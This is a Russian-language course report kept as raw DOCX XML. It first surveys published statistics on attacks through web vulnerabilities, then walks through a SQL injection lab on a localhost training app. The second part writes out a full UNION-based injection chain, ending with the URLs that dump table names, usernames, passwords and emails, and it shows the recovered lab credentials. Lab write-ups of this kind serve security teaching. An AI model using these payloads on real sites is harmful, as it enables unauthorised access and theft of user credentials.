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k5ekyokqfhv" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I часть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8iab962b0ml" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Источники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'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https://ptsecurity.com/research/analytics/aktual-nye-kiberugrozy-i-ii-kvartaly-2025-goda/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ' '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https://ptsecurity.com/research/analytics/web-vulnerabilities-2020-2021/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' '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https://www.verizon.com/about/news/2025-data-breach-investigations-report</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' '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https://services.google.com/fh/files/misc/m-trends-2025-en.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' '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https://owasp.org/Top10/2025/0x00_2025-Introduction/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' '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https://ptsecurity.com/research/analytics/russia-cyberthreat-landscape-2026/#id2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' '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https://bi.zone/expertise/blog/obzor-owasp-top-10-2025/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' '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https://www.comnews.ru/content/244332/2026-03-20/2026-w12/1010/odnu-kompaniyu-2025-g-prishlos-bolee-900-ddos-atak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elzafrxw5nl" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Доля успешных атак на организации, проведенных с помощью эксплуатации веб-уязвимостей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источниках я нашел довольно разные подходы к подсчету, поэтому я не стал сравнивать в процентном соотношении, а просто использовал их как ориентир.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 данным Positive Technologies, в I полугодии 2025 года эксплуатация уязвимостей использовалась в 31% успешных атак на организации. Это широкая метрика по всем уязвимостям, не только веб. При этом более ранние отчеты PT показывают, что веб-ресурсы компаний становились объектами атак в 17% случаев в 2021 году и уже в 22% случаев в 2022 году, а число атак с эксплуатацией веб-уязвимостей в 2022 году выросло на 67%. Эти данные не дают точную долю успешных атак именно через веб-уязвимости, но показывают, что веб-ресурсы часто подвергаются атакам.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Для сравнения можно взять Verizon DBIR 2025. В нем говорится, что эксплуатация уязвимостей была начальным вектором примерно в 20% подтвержденных breach-инцидентов. Также отдельно отмечается рост атак на edge-устройства и VPN. Эти данные лишь подтверждают тенденцию: уязвимости во внешнем периметре часто используются для первичного доступа.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отчете Mandiant M-Trends 2025 тоже видно, что эксплуатация уязвимостей часто используется в начале атаки. Среди расследованных инцидентов, где удалось определить начальный вектор, на эксплойты пришлось 33%. Регионально картина различалась: EMEA – 39%, Americas — 28%, JAPAC — 64%. В отчете Mandiant доля эксплойтов сильно отличается по регионам. Особенно высокие значения указаны для JAPAC и EMEA.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Похожую картину показывает и отчет CODE RED 2026, но я бы не сравнивал напрямую, потому что это не статистика реальных атак, а результаты пентестов. В ходе внешних тестов на проникновение специалисты PT SWARM использовали уязвимости веб-приложений в 60% попыток получения доступа во внутреннюю сеть компаний. Это уже не статистика реальных инцидентов, а результаты контролируемых проверок, но именно они хорошо показывают, насколько часто веб-приложение становится рабочей точкой входа в инфраструктуру.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n7fqwscbu0m" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Распределение по конкретным уязвимостям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Если брать российские данные по самим веб-приложениям, Positive Technologies в исследовании 2020–2021 гг. получила следующую картину. Во всех исследованных веб-приложениях были выявлены уязвимости класса Broken Access Control. Еще 83% приложений содержали проблемы класса Security Misconfiguration. Среди частных примеров misconfiguration исследователи отмечают отсутствие заголовка Strict-Transport-Security в 48% приложений и некорректный заголовок X-Content-Type-Options в 34% приложений.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Для промышленного сектора PT отдельно отмечает, что в 81% веб-приложений встречались уязвимости, связанные с внедрением кода (то есть различные injection-подобные проблемы), а в 44% – уязвимости, вызванные использованием небезопасных и устаревших компонентов. Если обобщить эти данные, чаще всего встречаются проблемы с доступом, настройками безопасности, внедрением кода и устаревшими компонентами.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Свежий отчет CODE RED 2026 дает более конкретное распределение по современным проблемам веб-приложений российских компаний. Наиболее распространенной уязвимостью стала недостаточная авторизация – 32% от всех выявленных уязвимостей, причем у 50% таких случаев риск был оценен как высокий. Также отсутствие защиты от подбора учетных данных было выявлено в 33% протестированных приложений, хранение паролей в открытом виде – в 12%, а раскрытие конфигурационной информации – в 16%.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Если брать зарубежные incident response данные, то Mandiant в 2024 году чаще всего наблюдала эксплуатацию следующих уязвимостей: CVE-2024-3400 в PAN-OS GlobalProtect, связку CVE-2023-46805 + CVE-2024-21887 в Ivanti Connect Secure / Policy Secure, а также CVE-2023-48788 в FortiClient EMS. Интересно, что 3 из 4 наиболее часто эксплуатируемых уязвимостей в выборке Mandiant сначала использовались как zero-day.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OWASP Top 10:2025 удобнее использовать не для конкретных CVE, а для понимания основных классов проблем. В верхней части списка находятся Broken Access Control и Security Misconfiguration. OWASP указывает среднюю incidence rate на уровне 3.74% для Broken Access Control, 3.00% для Security Misconfiguration, 3.80% для Cryptographic Failures и 3.08% для Injection. При этом в категории Injection отдельно подчеркивается, что туда входят как Cross-site Scripting (XSS) с более чем 30 тысячами CVE, так и SQL Injection с более чем 14 тысячами CVE.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yvgdzt34j7o" w:id="4"/>
      <w:bookmarkEnd w:id="4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Единую точную долю атак через веб-уязвимости назвать сложно. В разных отчетах считаются разные вещи: успешные атаки, подтвержденные утечки, начальный вектор или результаты пентестов. Но общий вывод один: уязвимости веб-приложений и внешнего периметра остаются важной точкой входа.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российских отчетах чаще всего выделяются проблемы контроля доступа, ошибки конфигурации, инъекции, устаревшие компоненты и слабая парольная защита. Зарубежные отчеты показывают похожую картину: эксплуатация уязвимостей часто используется для первичного доступа, особенно через публично доступные сервисы, VPN и edge устройства.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 веб-приложения и внешний периметр остаются удобной точкой входа для атакующих, а самые типичные проблемы связаны не только с SQL инъекциями или XSS, но и с неправильной авторизацией, настройками безопасности и устаревшими компонентами.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gcrh5w5ns8j8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">II часть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qb4q4o3f000n" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс работы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z6akicuuwwr" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Начало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Перед началом инициалилизировали базу данных(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http://localhost:8080/sql-connections/setup-db.php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На странице отображается текст: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Введите в качестве параметра ваш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eq6zoixkkmy0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Корректный запрос с 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Страница вывела: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id:1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логин:admin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Следовательно,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реально участвует в sql запросе и влияет на вывод.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vgm3dxw52pcw" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Проверка на ошибку SQL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Сервер вернул SQL-ошибку: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have an error in your SQL syntax...</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Значит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уязвим к SQL injection.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2qjp23gx208l" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Неудачные попытки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bwxukp8h7jdz" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Логическое условие без закрытия кавычки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http://localhost:8080/task?id=1%20AND%201=1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Вывод остался тем же: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id:1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логин:admin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45mzbm751e9v" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Логическое условие без закрытия кавычки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http://localhost:8080/task?id=1%20AND%201=2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Вывод остался тем же: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id:1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логин:admin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Инъекция не сработала, потому что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подставляется в SQL как строка, и нужно сначала закрыть строковую кавычку.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5unrnti910ug" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Попытки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без закрытия кавычки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http://localhost:8080/task?id=1%20ORDER%20BY%201%23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http://localhost:8080/task?id=1%20ORDER%20BY%202%23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http://localhost:8080/task?id=1%20ORDER%20BY%203%23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http://localhost:8080/task?id=1%20ORDER%20BY%204%23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Во всех случаях вывод оставался тем же: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id:1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логин:admin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Без закрытия кавычки SQL-код не исполняется.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1bx6i41ex7no" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Успешная булева SQL-инъекция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aes8qp33gbar" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка истинного условия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http://localhost:8080/task?id=1%27%20AND%20%271%27=%271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id:1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Ваш логин:admin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3r13vivt0rhw" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка ложного условия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http://localhost:8080/task?id=1%27%20AND%20%271%27=%272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Страница вернула пустой результат. Булева SQL-инъекция работает.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Следовательно,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используется примерно в конструкции вида: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... WHERE id = '$id' LIMIT 0,1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#### Определение количества столбцов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Были отправлены следующие запросы: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**URL:**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`http://localhost:8080/task?id=1%27%20ORDER%20BY%201%23`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`http://localhost:8080/task?id=1%27%20ORDER%20BY%202%23`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`http://localhost:8080/task?id=1%27%20ORDER%20BY%203%23`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`http://localhost:8080/task?id=1%27%20ORDER%20BY%204%23`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`http://localhost:8080/task?id=1%27%20ORDER%20BY%205%23`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**Результат:**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`ORDER BY 1` — работает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`ORDER BY 2` — работает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`ORDER BY 3` — работает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`ORDER BY 4` — ошибка: `Unknown column '4' in 'order clause'`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`ORDER BY 5` — ошибка: `Unknown column '5' in 'order clause'`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Исходный sql запрос содержит 3 столбца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6. Проверка подстановки значений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**URL:** `http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,2,3%23`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Страница вывела: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`Ваш id:1`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`Ваш логин:2`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`UNION SELECT` работает.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На страницу выводятся 1-й и 2-й столбцы.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7. Получение списка таблиц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**URL:** `http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(table_name),3%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%23`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**Вывод:** `Ваш логин:emails,users`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В базе найдены таблицы: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`emails`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`users`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8. Получение списка колонок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**URL:** `http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(table_name,0x3a,column_name%20SEPARATOR%200x7c),3%20FROM%20information_schema.columns%20WHERE%20table_schema=database()%23`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**Вывод:**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`Ваш логин:emails:id|emails:email_id|users:id|users:username|users:password`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Структура таблиц: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`users(id, username, password)`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`emails(id, email_id)`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Из этого следует, что почта пользователя, вероятно, связывается с пользователем по полю `id`.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9. Получение всех логинов и паролей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**URL:** `http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(username,0x3a,password%20SEPARATOR%200x7c),3%20FROM%20users%23`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**Результат:**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Были получены пары `username:password`, в том числе: `Volk2:Wa spoiuuuuu`, это именно тот пароль, что нам нужен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#### Получение логинов и email через JOIN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**URL:** `http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(users.username,0x3a,emails.email_id%20SEPARATOR%200x7c),3%20FROM%20users%20JOIN%20emails%20ON%20users.id=emails.id%23`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**Результат:**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Были получены пары `username:email`, в том числе: `Vinni-pukh:honey_lover@otus-lab.com`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10. Точечное подтверждение пароля пользователя Volk2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**URL:** `http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,password,3%20FROM%20users%20WHERE%20username=0x566f6c6b32%23`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**Результат:** `Ваш логин:Wa spoiuuuuu`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Итого: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1. **Пароль пользователя `Volk2`:**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`Wa spoiuuuuu`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**Почта пользователя `Vinni-pukh`:**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`honey_lover@otus-lab.com`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Список всех использованных URL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http://localhost:8080/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http://localhost:8080/sql-connections/setup-db.php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http://localhost:8080/task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http://localhost:8080/task?id=1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http://localhost:8080/task?id=1%27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http://localhost:8080/task?id=1%20AND%201=1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http://localhost:8080/task?id=1%20AND%201=2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http://localhost:8080/task?id=1%20ORDER%20BY%201%23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http://localhost:8080/task?id=1%20ORDER%20BY%202%23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http://localhost:8080/task?id=1%20ORDER%20BY%203%23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http://localhost:8080/task?id=1%20ORDER%20BY%204%23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http://localhost:8080/task?id=1%27%20AND%20%271%27=%271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http://localhost:8080/task?id=1%27%20AND%20%271%27=%272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http://localhost:8080/task?id=1%27%20ORDER%20BY%201%23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http://localhost:8080/task?id=1%27%20ORDER%20BY%202%23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http://localhost:8080/task?id=1%27%20ORDER%20BY%203%23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http://localhost:8080/task?id=1%27%20ORDER%20BY%204%23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http://localhost:8080/task?id=1%27%20ORDER%20BY%205%23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http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,2,3%23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http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(table_name),3%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%23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http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(table_name,0x3a,column_name%20SEPARATOR%200x7c),3%20FROM%20information_schema.columns%20WHERE%20table_schema=database()%23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http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(username,0x3a,password%20SEPARATOR%200x7c),3%20FROM%20users%23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http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,group_concat(users.username,0x3a,emails.email_id%20SEPARATOR%200x7c),3%20FROM%20users%20JOIN%20emails%20ON%20users.id=emails.id%23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http://localhost:8080/task?id=-1%27%20UNION%20SELECT%201,password,3%20FROM%20users%20WHERE%20username=0x566f6c6b32%23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tsecurity.com/research/analytics/russia-cyberthreat-landscape-2026/#id2" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/2025/0x00_2025-Introduction/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comnews.ru/content/244332/2026-03-20/2026-w12/1010/odnu-kompaniyu-2025-g-prishlos-bolee-900-ddos-atak" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bi.zone/expertise/blog/obzor-owasp-top-10-202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rvices.google.com/fh/files/misc/m-trends-2025-en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tsecurity.com/research/analytics/aktual-nye-kiberugrozy-i-ii-kvartaly-2025-goda/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptsecurity.com/research/analytics/web-vulnerabilities-2020-2021/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.verizon.com/about/news/2025-data-breach-investigations-repo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